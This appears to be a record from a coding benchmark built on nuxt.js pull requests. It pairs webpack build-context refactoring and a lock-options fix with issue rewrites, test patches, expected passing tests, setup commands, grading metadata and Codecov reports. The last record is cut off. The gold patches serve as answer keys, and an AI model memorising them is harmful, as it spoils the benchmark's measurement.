PerfLoader.defaultPools(options) - PerfLoader.warmup(options.js, [ + static warmupAll({ dev }) { + const pools = PerfLoader.defaultPools({ dev }) + PerfLoader.warmup(pools.js, [ require.resolve('babel-loader'), require.resolve('@babel/preset-env') ]) - PerfLoader.warmup(options.css, ['css-loader']) + PerfLoader.warmup(pools.css, ['css-loader']) } static warmup(...args) { @@ -41,7 +41,7 @@ export default class PerfLoader { use(poolName) { const loaders = [] - if (this.options.build.cache) { + if (this.buildContext.buildOptions.cache) { loaders.push({ loader: 'cache-loader', options: { @@ -50,7 +50,7 @@ export default class PerfLoader { }) } - if (this.options.build.parallel) { + if (this.buildContext.buildOptions.parallel) { const pool = this.workerPools[poolName] if (pool) { loaders.push({ diff --git a/packages/webpack/src/utils/postcss.js b/packages/webpack/src/utils/postcss.js index 0e82a78c2..0f3246948 100644 --- a/packages/webpack/src/utils/postcss.js +++ b/packages/webpack/src/utils/postcss.js @@ -19,34 +19,29 @@ export const orderPresets = { } export default class PostcssConfig { - constructor(options, nuxt) { - this.nuxt = nuxt - this.dev = options.dev - this.postcss = options.build.postcss - this.srcDir = options.srcDir - this.rootDir = options.rootDir - this.cssSourceMap = options.build.cssSourceMap - this.modulesDir = options.modulesDir + constructor(buildContext) { + this.buildContext = buildContext + } + + get postcssOptions() { + return this.buildContext.buildOptions.postcss } get defaultConfig() { + const { dev, srcDir, rootDir, modulesDir } = this.buildContext.options return { - sourceMap: this.cssSourceMap, + sourceMap: this.buildContext.buildOptions.cssSourceMap, plugins: { // https://github.com/postcss/postcss-import 'postcss-import': { resolve: createResolver({ alias: { - '~': path.join(this.srcDir), - '~~': path.join(this.rootDir), - '@': path.join(this.srcDir), - '@@': path.join(this.rootDir) + '~': path.join(srcDir), + '~~': path.join(rootDir), + '@': path.join(srcDir), + '@@': path.join(rootDir) }, - modules: [ - this.srcDir, - this.rootDir, - ...this.modulesDir - ] + modules: [ srcDir, rootDir, ...modulesDir ] }) }, @@ -55,7 +50,7 @@ export default class PostcssConfig { // https://github.com/csstools/postcss-preset-env 'postcss-preset-env': this.preset || {}, - 'cssnano': this.dev ? false : { preset: 'default' } + 'cssnano': dev ? false : { preset: 'default' } }, // Array, String or Function order: 'cssnanoLast' @@ -65,7 +60,8 @@ export default class PostcssConfig { searchConfigFile() { // Search for postCSS config file and use it if exists // https://github.com/michael-ciniawsky/postcss-load-config - for (const dir of [this.srcDir, this.rootDir]) { + const { srcDir, rootDir } = this.buildContext.options + for (const dir of [ srcDir, rootDir ]) { for (const file of [ 'postcss.config.js', '.postcssrc.js', @@ -82,12 +78,12 @@ export default class PostcssConfig { } configFromFile() { - const loaderConfig = (this.postcss && this.postcss.config) || {} + const loaderConfig = (this.postcssOptions && this.postcssOptions.config) || {} loaderConfig.path = loaderConfig.path || this.searchConfigFile() if (loaderConfig.path) { return { - sourceMap: this.cssSourceMap, + sourceMap: this.buildContext.buildOptions.cssSourceMap, config: loaderConfig } } @@ -117,7 +113,7 @@ export default class PostcssConfig { // Map postcss plugins into instances on object mode once config.plugins = this.sortPlugins(config) .map((p) => { - const plugin = this.nuxt.resolver.requireModule(p) + const plugin = this.buildContext.nuxt.resolver.requireModule(p) const opts = plugins[p] if (opts === false) { return // Disabled @@ -130,7 +126,7 @@ export default class PostcssConfig { config() { /* istanbul ignore if */ - if (!this.postcss) { + if (!this.postcssOptions) { return false } @@ -139,7 +135,7 @@ export default class PostcssConfig { return config } - config = this.normalize(cloneDeep(this.postcss)) + config = this.normalize(cloneDeep(this.postcssOptions)) // Apply default plugins if (isPureObject(config)) { diff --git a/packages/webpack/src/utils/style-loader.js b/packages/webpack/src/utils/style-loader.js index be247b99a..b6fb589f1 100644 --- a/packages/webpack/src/utils/style-loader.js +++ b/packages/webpack/src/utils/style-loader.js @@ -6,24 +6,20 @@ import { wrapArray } from '@nuxt/utils' import PostcssConfig from './postcss' export default class StyleLoader { - constructor(options, nuxt, { isServer, perfLoader }) { + constructor(buildContext, { isServer, perfLoader }) { + this.buildContext = buildContext this.isServer = isServer this.perfLoader = perfLoader - this.rootDir = options.rootDir - this.loaders = { - vueStyle: options.build.loaders.vueStyle, - css: options.build.loaders.css, - cssModules: options.build.loaders.cssModules - } - this.extractCSS = options.build.extractCSS - this.resources = options.build.styleResources - this.sourceMap = Boolean(options.build.cssSourceMap) - if (options.build.postcss) { - this.postcssConfig = new PostcssConfig(options, nuxt) + if (buildContext.options.build.postcss) { + this.postcssConfig = new PostcssConfig(buildContext) } } + get extractCSS() { + return this.buildContext.buildOptions.extractCSS + } + get exportOnlyLocals() { return Boolean(this.isServer && this.extractCSS) } @@ -34,19 +30,20 @@ export default class StyleLoader { } styleResource(ext) { - const extResource = this.resources[ext] + const { buildOptions: { styleResources }, options: { rootDir } } = this.buildContext + const extResource = styleResources[ext] // style-resources-loader // https://github.com/yenshih/style-resources-loader if (!extResource) { return } - const patterns = wrapArray(extResource).map(p => path.resolve(this.rootDir, p)) + const patterns = wrapArray(extResource).map(p => path.resolve(rootDir, p)) return { loader: 'style-resources-loader', options: Object.assign( { patterns }, - this.resources.options || {} + styleResources.options || {} ) } } @@ -66,7 +63,7 @@ export default class StyleLoader { return { loader: 'postcss-loader', - options: Object.assign({ sourceMap: this.sourceMap }, config) + options: Object.assign({ sourceMap: this.buildContext.buildOptions.cssSourceMap }, config) } } @@ -94,32 +91,34 @@ export default class StyleLoader { styleLoader() { return this.extract() || { loader: 'vue-style-loader', - options: this.loaders.vueStyle + options: this.buildContext.buildOptions.loaders.vueStyle } } apply(ext, loaders = []) { + const { css, cssModules } = this.buildContext.buildOptions.loaders + const customLoaders = [].concat( this.postcss(), this.normalize(loaders), this.styleResource(ext) ).filter(Boolean) - this.loaders.css.importLoaders = this.loaders.cssModules.importLoaders = customLoaders.length + css.importLoaders = cssModules.importLoaders = customLoaders.length return [ // This matches <style module> { resourceQuery: /module/, use: this.perfLoader.css().concat( - this.cssModules(this.loaders.cssModules), + this.cssModules(cssModules), customLoaders ) }, // This matches plain <style> or <style scoped> { use: this.perfLoader.css().concat( - this.css(this.loaders.css), + this.css(css), customLoaders ) }
refactor: unify context in webpack module <!--- Provide a general summary of your changes in the title above --> ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [ ] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description <!--- Describe your changes in detail --> <!--- Why is this change required? What problem does it solve? --> <!--- If it resolves an open issue, please link to the issue here. For example "Resolves: #1337" --> ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [ ] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing.
**Title** Unify build context handling across the webpack bundler and its configuration classes **Problem** Various parts of the webpack integration accessed build‑related settings through different paths, leading to fragmented and sometimes out‑of‑sync configuration data. This made it hard to guarantee that the bundler, loaders, and plugins all operated on the same set of options, especially when toggling development mode, static generation, or custom build flags. **Root Cause** The builder passed a generic context that mixed runtime and build settings, and the code repeatedly reached into nested option objects instead of a single source of truth. **Fix / Expected Behavior** - Introduce a dedicated build context that encapsulates all build‑specific options. - Refactor the bundler and all webpack configuration classes to retrieve settings exclusively from this unified build context. - Update constructors and internal references so that loaders, plugins, and utility helpers consistently use the new build context. - Ensure derived values (e.g., dev vs. production mode, public paths, static flag, style resources, loader configurations) are correctly reflected throughout the build pipeline. - Preserve existing functionality such as hot‑module replacement, CSS extraction, modern build handling, and build‑time hooks while using the unified source. **Risk & Validation** - Run the full test suite to detect regressions in both development and production builds. - Manually verify that builds succeed with custom options (e.g., extractCSS, analyze, styleResources) and that generated assets and server bundles are unchanged. - Confirm that static generation mode correctly sets the static flag and that hot‑middleware operates as expected in dev mode.
5,054
nuxt/nuxt.js
diff --git a/packages/builder/test/context/build.test.js b/packages/builder/test/context/build.test.js index 693d96ed2..a067add15 100644 --- a/packages/builder/test/context/build.test.js +++ b/packages/builder/test/context/build.test.js @@ -20,4 +20,14 @@ describe('builder: buildContext', () => { const context = new BuildContext(builder) expect(context.plugins).toEqual(builder.plugins) }) + + test('should return builder build options', () => { + const buildOptions = { id: 'test-build-options' } + const builder = { + plugins: [], + nuxt: { options: { build: buildOptions } } + } + const context = new BuildContext(builder) + expect(context.buildOptions).toEqual(buildOptions) + }) }) diff --git a/test/unit/basic.generate.test.js b/test/unit/basic.generate.test.js index 371165dd1..d391efe5e 100644 --- a/test/unit/basic.generate.test.js +++ b/test/unit/basic.generate.test.js @@ -46,7 +46,7 @@ describe('basic generate', () => { }) test('Check builder', () => { - expect(builder.bundleBuilder.context.isStatic).toBe(true) + expect(builder.bundleBuilder.buildContext.isStatic).toBe(true) expect(builder.build).toHaveBeenCalledTimes(1) }) diff --git a/test/unit/wp.config.test.js b/test/unit/wp.config.test.js index 500ec8528..04af2f43d 100644 --- a/test/unit/wp.config.test.js +++ b/test/unit/wp.config.test.js @@ -15,16 +15,18 @@ describe('webpack configuration', () => { ]) expect(PerfLoader.warmup).toHaveBeenCalledWith(css, ['css-loader']) - const perfLoader = new PerfLoader({ - name: 'test-perf', - options: { - dev: true, - build: { + const perfLoader = new PerfLoader( + 'test-perf', + { + options: { + dev: true + }, + buildOptions: { parallel: true, cache: true } } - }) + ) expect(perfLoader.workerPools).toMatchObject({ js, css }) const loaders = perfLoader.use('js') const cacheDirectory = path.resolve('node_modules/.cache/cache-loader/test-perf')
[ "should return builder build options" ]
[ "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should list all commands", "should export Module, Nuxt and Resolver", "should get context with req and res", "should get correct globals", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should export Builder", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should export getDefaultNuxtConfig and getNuxtConfig", "should export Generator", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should return globals with given globalName", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "should export all methods from utils folder", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should construct context", "should return builder plugins context", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore" ]
Method: BuildContext.buildOptions Location: packages/builder/src/context/build.js → class BuildContext Inputs: None (getter property) Outputs: Returns the `build` object from the builder’s Nuxt options (`builder.nuxt.options.build`). Used to expose build configuration through the context. Description: Provides read‑only access to the Nuxt build options from a `BuildContext` instance. Called in tests to verify that the context forwards the builder’s build options. Function: PerfLoader(name, buildContext) Location: packages/webpack/src/utils/perf-loader.js → class PerfLoader Inputs: - `name` (string) – identifier for the loader instance. - `buildContext` (object) – the build context containing at least `options.dev` and `buildOptions` (e.g., `parallel`, `cache`). Outputs: - Creates a `PerfLoader` instance with `this.name`, `this.buildContext`, and `this.workerPools` (derived from `buildContext.options.dev`). - Provides a proxy that forwards unknown property accesses to `use(name)`. Description: Constructs a performance‑aware loader helper that configures thread‑loader pools based on the build’s dev mode and exposes loader shortcuts. Instantiated in tests with a mock context to verify pool creation and property access.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 9, "num_modified_lines": 175, "pr_author": "clarkdo", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.82, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue text only contains a generic PR template with no description of the desired changes, leaving the required behavior ambiguous. The test patch introduces new expectations (e.g., a BuildContext.buildOptions getter and renaming of context to buildContext) that are not mentioned in the issue, indicating a mismatch between the stated intent and the tests. This lack of clear specification signals an ambiguous specification problem, fitting B4. No other B‑category signals are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect a `buildOptions` getter on BuildContext which is not described in the issue", "Tests rename `builder.bundleBuilder.context` to `builder.bundleBuilder.buildContext` without specification" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3153e89645cce9f487d745e42f189da53cb4faed
2019-03-21 19:59:34
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=h1) Report > Merging [#5320](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3153e89645cce9f487d745e42f189da53cb4faed?src=pr&el=desc) will **decrease** coverage by `0.03%`. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5320 +/- ## ========================================= - Coverage 95.7% 95.66% -0.04% ========================================= Files 74 74 Lines 2512 2514 +2 Branches 639 639 ========================================= + Hits 2404 2405 +1 - Misses 91 92 +1 Partials 17 17 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/utils/src/locking.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/diff?src=pr&el=tree#diff-cGFja2FnZXMvdXRpbHMvc3JjL2xvY2tpbmcuanM=) | `100% <100%> (ø)` | :arrow_up: | | [packages/vue-renderer/src/renderer.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/diff?src=pr&el=tree#diff-cGFja2FnZXMvdnVlLXJlbmRlcmVyL3NyYy9yZW5kZXJlci5qcw==) | `91.58% <0%> (-0.5%)` | :arrow_down: | | [packages/core/src/hookable.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/diff?src=pr&el=tree#diff-cGFja2FnZXMvY29yZS9zcmMvaG9va2FibGUuanM=) | `100% <0%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=footer). Last update [3153e89...abd7fb8](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5320
diff --git a/packages/utils/src/locking.js b/packages/utils/src/locking.js index 68cc1a731..d0ee5f0f0 100644 --- a/packages/utils/src/locking.js +++ b/packages/utils/src/locking.js @@ -40,6 +40,7 @@ export async function lock({ id, dir, root, options }) { consola.fatal(`A lock with id '${id}' already exists on ${dir}`) } + options = getLockOptions(options) const release = await properlock.lock(lockPath, options) if (!release) {
fix: apply default lock options before setting lock <!--- Provide a general summary of your changes in the title above --> ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [x] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description <!--- Describe your changes in detail --> <!--- Why is this change required? What problem does it solve? --> <!--- If it resolves an open issue, please link to the issue here. For example "Resolves: #1337" --> As second / third time is the charm, now not only relax the lock settings but also really use them. Sorry :blush: ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [x] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing. Fixes: #5319
**Title** Apply default lock options before acquiring a lock **Problem** The locking utility was passing raw options directly to the underlying lock implementation, so default values were never applied. This could lead to unexpected lock timeouts or retries and cause intermittent failures. **Root Cause** The options object was not normalized through the helper that injects default lock settings before calling the lock function. **Fix / Expected Behavior** - Process incoming lock options through the default‑options helper prior to invoking the lock. - Ensure default values (e.g., stale time, retry count, timeout) are always respected when not explicitly provided. - Preserve existing custom option handling while adding the default processing step. - Keep the lock release semantics unchanged. - Added tests to confirm default options are applied correctly. **Risk & Validation** - Verify that custom options still behave identically after the change. - Run the full test suite, including the new tests covering default option handling. - Perform manual lock acquisition scenarios to ensure no regression in lock timing or release.
5,320
nuxt/nuxt.js
diff --git a/packages/utils/test/locking.test.js b/packages/utils/test/locking.test.js index 58dfcf5c4..225c64157 100644 --- a/packages/utils/test/locking.test.js +++ b/packages/utils/test/locking.test.js @@ -18,16 +18,16 @@ describe('util: locking', () => { beforeEach(() => jest.resetAllMocks()) beforeEach(() => lockPaths.clear()) - test('onCompromised lock is warn error by default', () => { + test('onCompromised lock warns on compromise by default', () => { defaultLockOptions.onCompromised() expect(consola.warn).toHaveBeenCalledTimes(1) }) test('can override default options', () => { - const options = getLockOptions({ onCompromised: err => consola.warn(err) }) + const options = getLockOptions({ onCompromised: err => consola.fatal(err) }) options.onCompromised() - expect(consola.warn).toHaveBeenCalledTimes(1) + expect(consola.fatal).toHaveBeenCalledTimes(1) }) test('createLockPath creates the same lockPath for identical locks', () => { @@ -143,4 +143,17 @@ describe('util: locking', () => { expect(fs.removeSync).toHaveBeenCalledWith(path1) expect(fs.removeSync).toHaveBeenCalledWith(path2) }) + + test('lock uses setLockOptions to set defaults', async () => { + const spy = properlock.lock.mockImplementationOnce(() => true) + + await lock(lockConfig) + + expect(spy).toHaveBeenCalledWith(expect.any(String), expect.any(Object)) + const options = spy.mock.calls[0][1] + expect(options.stale).toBeDefined() + expect(options.onCompromised).toBeDefined() + expect(() => options.onCompromised()).not.toThrow() + expect(consola.fatal).not.toHaveBeenCalled() + }) })
[ "lock uses setLockOptions to set defaults" ]
[ "should construct context", "should return builder plugins context", "should return builder build options", "should export Module, Nuxt and Resolver", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should get context with req and res", "should get correct globals", "should export Generator", "should export getDefaultNuxtConfig and getNuxtConfig", "should export Builder", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should list all commands", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should return globals with given globalName", "should export Server and Listener", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute http url", "should compute https url", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should return dev filenames", "should return prod filenames", "should return modern filenames", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock logs warning when it couldnt get a lock", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when called", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should export all methods from utils folder", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source" ]
Method: defaultLockOptions.onCompromised() Location: exported constant `defaultLockOptions` in **packages/utils/src/locking.js** (used directly in tests) Inputs: none (the method is bound to the default options object) Outputs: calls `consola.warn` (or the overridden handler) – does not throw by default Description: Default handler invoked when a lock is detected as compromised; can be overridden via lock options. Function: getLockOptions(customOptions?) Location: exported function in **packages/utils/src/locking.js**, called by tests and internally by `lock` Inputs: - `customOptions` (optional Object) – may contain `onCompromised`, `stale`, and other proper‑lock options. Outputs: - Returns a new options object that merges `defaultLockOptions` with any supplied `customOptions`. Guarantees that `onCompromised` and `stale` fields are defined (fallback to defaults if omitted). Description: Normalises lock configuration by applying default behaviours before the lock is created. Function: lock({ id, dir, root, options }) Location: exported async function in **packages/utils/src/locking.js** Inputs: - `id` (string) – identifier of the lock. - `dir` (string) – directory where the lock file will be placed. - `root` (string) – base path used to compute the lock file location. - `options` (optional Object) – custom lock options; will be passed through `getLockOptions` to ensure defaults. Outputs: - Returns the release function from `properlock.lock` (or `true` in mocked tests). May throw a fatal error if a lock with the same `id` already exists. Description: Acquires a filesystem lock using `properlock.lock`, first applying default lock options (including `stale` and `onCompromised`). The test verifies that the merged options are supplied to the underlying lock implementation and that the default `onCompromised` handler does not raise exceptions.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "pimlie", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue aims to ensure default lock options are applied before acquiring a lock. The added test checks that the lock function calls the underlying library with an options object that includes the defaults and that the onCompromised handler is safe, matching the described fix. No test assertions introduce requirements beyond the issue, and there are no external dependencies or naming expectations not covered by the repo. Therefore the task is well‑specified and solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3c50876d737ced86f2e3677c1ee7be6328dcdcc9
2019-03-22 19:21:14
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=h1) Report > Merging [#5347](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3c50876d737ced86f2e3677c1ee7be6328dcdcc9?src=pr&el=desc) will **decrease** coverage by `44.73%`. > The diff coverage is `0%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5347 +/- ## =========================================== - Coverage 95.66% 50.92% -44.74% =========================================== Files 74 74 Lines 2513 2529 +16 Branches 639 641 +2 =========================================== - Hits 2404 1288 -1116 - Misses 92 962 +870 - Partials 17 279 +262 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/utils/src/locking.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvdXRpbHMvc3JjL2xvY2tpbmcuanM=) | `4.76% <0%> (-95.24%)` | :arrow_down: | | [packages/generator/src/generator.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvZ2VuZXJhdG9yL3NyYy9nZW5lcmF0b3IuanM=) | `0% <0%> (-100%)` | :arrow_down: | | [packages/typescript/src/index.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvdHlwZXNjcmlwdC9zcmMvaW5kZXguanM=) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/index.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9pbmRleC5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/options/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9vcHRpb25zL3NlcnZlci5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/run.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9ydW4uanM=) | `0% <0%> (-100%)` | :arrow_down: | | 